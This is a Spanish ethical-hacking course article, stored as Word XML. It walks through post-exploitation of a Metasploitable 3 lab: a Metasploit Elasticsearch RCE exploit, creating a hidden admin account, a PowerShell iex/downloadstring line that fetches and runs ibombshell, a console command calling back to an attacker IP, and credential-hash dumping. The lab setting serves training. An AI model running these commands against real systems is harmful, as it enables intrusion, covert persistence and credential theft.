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78074" w14:textId="35219E51" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED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273B47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59CFA35A" wp14:editId="32F9D308">
              <wp:extent cx="283845" cy="283845"/>
              <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
              <wp:docPr id="35" name="Imagen 35" descr="Curso de Hacking Ético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urso de Hacking Ético">
                        <a:hlinkClick r:id="rId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384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27EED">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>Curso de Hacking Ético</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28A7B4F0" w14:textId="77777777" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="cooper_hewittmedium" w:eastAsia="Times New Roman" w:hAnsi="cooper_hewittmedium" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727EED">
        <w:rPr>
          <w:rFonts w:ascii="cooper_hewittmedium" w:eastAsia="Times New Roman" w:hAnsi="cooper_hewittmedium" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="36"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0791E6"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Artículo</w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED">
        <w:rPr>
          <w:rFonts w:ascii="cooper_hewittmedium" w:eastAsia="Times New Roman" w:hAnsi="cooper_hewittmedium" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Fase Post-ataque. Metodologías</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D52A03" w14:textId="742E9F28" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED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es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBA975A" wp14:editId="7631EBC3">
            <wp:extent cx="378460" cy="378460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="34" name="Imagen 34" descr="Curso de Hacking É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rso de Hacking Étic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" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>Alan Joaquín Baeza Meza</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40B9923A" w14:textId="77777777" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6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es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>26 de Abril de 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B8C72" w14:textId="148D12FC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Para esta práctica se aprovechará la vulnerabilidad de </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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elasticsearch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 en Metasploitable 3. Para esto iniciamos msfconsole y seleccionar el exploit a utilizar con el comando use de la herrramienta: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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Use exploit/multi/elasticsearch/script_mvel_rce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4A4D2180" wp14:editId="28D87F01">
            <wp:extent cx="5400040" cy="635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7AEEE" w14:textId="374C3D16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Nota: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 es importante agregar el RHOST que será el equipo objetivo.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  <w:t>Nos devolverá una Shell Meterpreter.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0C0B021F" wp14:editId="213632EC">
            <wp:extent cx="5400040" cy="8223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EBF2C" w14:textId="0A84C306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Con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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pwd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 mostrará la dirección donde te encuentras.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1D5D11D7" wp14:editId="4061FF1D">
            <wp:extent cx="5400040" cy="619760"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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8C53C" w14:textId="048FEAC7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Para obtener el número de proceso mediante </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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getpid.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16822FE3" wp14:editId="20BCC2F5">
            <wp:extent cx="5400040" cy="619760"/>
            <wp:effectExtent l="0" t="0" r="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38F3A" w14:textId="292E8223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El usuario se obtiene con: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1B73D595" wp14:editId="2FF37078">
            <wp:extent cx="5400040" cy="619760"/>
            <wp:effectExtent l="0" t="0" r="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A6448" w14:textId="57BAB3E8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Para conocer mayores detalles del sistema operativo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45D57EDC" wp14:editId="58FF5DB4">
            <wp:extent cx="5400040" cy="872490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6118B" w14:textId="15A12BB7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>Con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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ps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 se mostrarán los procesos corriendo dentro del sistema.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2A708D93" wp14:editId="2EE155B1">
            <wp:extent cx="5400040" cy="316357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BF735" w14:textId="2C7B8D1A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Conocer su tabla ARP ayudará determinar rápidamente equipos dentro de la red.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3AF3F71A" wp14:editId="59A866C6">
            <wp:extent cx="5400040" cy="450151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93CD" w14:textId="7CF64CEC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lastRenderedPageBreak/>
        <w:t>Obteniendo una Shell del sistema y utilizando escritorio remoto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  <w:t>Se ejecuta el comando Shell.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3C5B6ADA" wp14:editId="37A2D5F1">
            <wp:extent cx="5400040" cy="1617345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E20B9" w14:textId="329CB5F1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Obteniendo los usuarios.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1A1EEED6" wp14:editId="03C834C2">
            <wp:extent cx="5400040" cy="228854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A3FC9" w14:textId="55512F92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Agregar un usuario de nombre </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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pedro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 y el password </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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pedro1234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2FBD3FB7" wp14:editId="2C4E5CF7">
            <wp:extent cx="5400040" cy="626110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DCF0B" w14:textId="2EDA3254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Después agregarlo al grupo de administradores con el comando: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0A421D42" wp14:editId="1581C7C9">
            <wp:extent cx="5400040" cy="626110"/>
            <wp:effectExtent l="0" t="0" r="0" b="25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CCEB6" w14:textId="7E02DF58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En otra terminal se ejecuta el comando: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25693549" wp14:editId="6DF57E80">
            <wp:extent cx="5400040" cy="626110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2DD62" w14:textId="159411A4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Hasta aquí todo bien, pero el tener un usuario extra es muy evidente y el administrador de sistemas puede sospechar rápidamente. Por lo cual se hará uso de la herramienta </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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Ibombshell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 la cual está escrita en Powershell que permite rápidamente obtener funcionalidades post-exploit en cualquier instante y sistema operativo a través de un repositorio de Github.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  <w:t xml:space="preserve">Es una shell remota que se carga directamente en memoria sin ser almacenado en disco, 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>por lo cual se dejan menos rastros y proporciona acceso a una gran cantidad de características de pentesting.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502DEFDC" wp14:editId="0279CC02">
            <wp:extent cx="5400040" cy="219964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3B418" w14:textId="77777777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Jugando con IbombShell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  <w:t>En el equipo donde se encuentra Kali Linux se descarga el repositorio de “ibombshell” en el siguiente enlace.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hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6520DF19" w14:textId="77777777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Se extrae la carpeta en el directorio de su elección para este ejercicio en la carpeta descargas.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hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell/archive/master.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="391BAEF4" w14:textId="11D2F2E9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Para descomprimir con el comando unzip ibombshell-master.zip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0D57A98F" wp14:editId="0FDC4F18">
            <wp:extent cx="5400040" cy="145478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39D8E" w14:textId="426FB76D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Se ingresa a la carpeta ibombshell-master/ibomshell c2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7710963B" wp14:editId="0DD51412">
            <wp:extent cx="5400040" cy="817245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04566" w14:textId="28EAE0B7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Ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt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 para instalar.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526059FB" wp14:editId="1288E5F7">
            <wp:extent cx="5400040" cy="86995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3AC9" w14:textId="0F6133CE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>Para iniciar e ingresa pyhton3 </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>ibombshell.py</w:t>
        </w:r>
      </w:hyperlink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, con lo cual aparecerá la siguiente pantalla una vez terminada la carga.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5568D876" wp14:editId="1DD855D3">
            <wp:extent cx="5400040" cy="3058795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31DF8" w14:textId="73F18BD4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Se crea un listener, para esto es necesario cargar el módulo.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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>load modules/listener.py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3244FE62" wp14:editId="52006362">
            <wp:extent cx="5400040" cy="88074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6A9E" w14:textId="36B30370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>Para ver las opciones que presenta el módulo se ejecuta el comando “show”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1BDFD570" wp14:editId="7D6F6CEF">
            <wp:extent cx="5400040" cy="4582160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F9BA" w14:textId="0EB267C1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Se puede utilizar los parámetros por defecto, pero si el puerto de escucha se encuentra ocupado pueden utilizar otro sin problema. Para iniciar el módulo con el comando “run”, quedando a la escucha en espera de una conexión.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750BE960" wp14:editId="6A064C85">
            <wp:extent cx="5400040" cy="758825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4C9B" w14:textId="1FCC0654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Para realizar una conexión, en el equipo donde se encuentra instalado Metaploitable 3 se inicia escritorio remoto y con el usuario previamente creado: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Usuario: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 pedro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lastRenderedPageBreak/>
        <w:t>Password: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 pedro1234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6504F0D9" wp14:editId="194C50FF">
            <wp:extent cx="5400040" cy="38182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AFB2" w14:textId="2D71C53B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Se prosigue a abrir Powershell y se ejecuta el siguiente comando para obtener una consola de Ibombshell.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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)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0998A11B" wp14:editId="3173402D">
            <wp:extent cx="5400040" cy="6946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C3440" w14:textId="0D9F6192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Para obtener una consola que se comunique con nuestro equipo se ejecuta el comando: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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>console -Silently -uriConsole http://192.168.2.5:8080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3F694E58" wp14:editId="5B2AA240">
            <wp:extent cx="5400040" cy="5175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D6D5D" w14:textId="2A923F66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Al ejecutar el comando anterior, se mostrará en nuestro módulo de Ibombshell un nuevo </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EED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warrior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 (Equipo conectado).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45EF4F06" wp14:editId="74A64AD8">
            <wp:extent cx="5400040" cy="5175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97B34" w14:textId="63405FE9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>Para ver el listado de los warrios se ejecuta el comando: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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Warrior list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08B776D8" wp14:editId="124E5C87">
            <wp:extent cx="5400040" cy="5175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83B61" w14:textId="4054052E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Se configura el módulo para establecer la comunicación.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0156F1E6" wp14:editId="0631D20E">
            <wp:extent cx="5400040" cy="3054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AC8A3" w14:textId="0E6BD047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Después se selecciona el warrior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7F8AA538" wp14:editId="1C589C2B">
            <wp:extent cx="5400040" cy="3054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FEB3C" w14:textId="71BEB980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Se manda una instrucción en este caso “whoami”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04F15D0B" wp14:editId="4B2BFE11">
            <wp:extent cx="5400040" cy="330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0245A" w14:textId="11182C60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Con el comando run se mostrará el resultado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3A8B2C37" wp14:editId="3BD26276">
            <wp:extent cx="5400040" cy="11334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F7C72" w14:textId="3B4A841E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Para obtener las credenciales del equipo basta con carga el módulo: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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-PE"/>
        </w:rPr>
        <w:t>Load modules/credentials/invoke-powerdump.py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082BFCD2" wp14:editId="56ACB938">
            <wp:extent cx="5400040" cy="3841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5DCAE" w14:textId="577FA221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Se establece el warrior que sigue siendo el mismo.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1A8EB8AB" wp14:editId="1EC06F6E">
            <wp:extent cx="5400040" cy="3841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F30E" w14:textId="07B9D236" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EE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t>Se ejecuta con el comando “Run” y se obtienen los usuarios junto con los hashes de las contraseñas.</w:t>
      </w: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727EED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704F2A52" wp14:editId="6F9D7C63">
            <wp:extent cx="5400040" cy="28378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2386" w14:textId="77777777" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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>Entre otras cosas interesante que permite Ibombshell es desactivar el análisis en tiempo real de Windows Defender, bypass de UAC, obtener llaves SSH y realizar movimientos laterales. Como pueden observar una herramienta muy interesante que debemos añadir en nuestro arsenal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B9170" w14:textId="77777777" w:rsidR="00727EED" w:rsidRPr="00727EED" w:rsidRDefault="00727EED" w:rsidP="00727EED">
      <w:pPr>
        <w:spacing w:line="384" w:lineRule="atLeast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  <w:r w:rsidRPr="00727EED"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  <w:t>Repo GitHub : </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00727EED">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0791E6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US" w:eastAsia="es-PE"/>
          </w:rPr>
          <w:t>https://github.com/ElevenPaths/ibombshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51BF6B2C" w14:textId="12D5641D" w:rsidR="00B321D8" w:rsidRDefault="00727EED">
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00B321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_hewittmedium">
    <w:altName w:val="Cooper Black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C90"/>
    <w:rsid w:val="00727EED"/>
    <w:rsid w:val="007E2C90"/>
    <w:rsid w:val="00B3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C35D0B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9E40F185-EF25-45E3-B743-3100BEA2F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7E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27EED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727EED"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="discussioninfo-time">
    <w:name w:val="discussioninfo-time"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00727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NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00727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27EED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00727EE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6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3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8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2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82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hyperlink" Target="https://platzi.com/@ajbaez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hyperlink" Target="https://github.com/ElevenPaths/ibombshell/archive/master.zip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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ElevenPaths/ibombshell" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://platzi.com/clases/ethical-hacking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github.com/ElevenPaths/ibombshell" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ibombshell.py/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711</Words>
  <Characters>3914</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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 Toledo Alcala</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Luis Angel Toledo Alcala</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-20T02:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-20T02:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>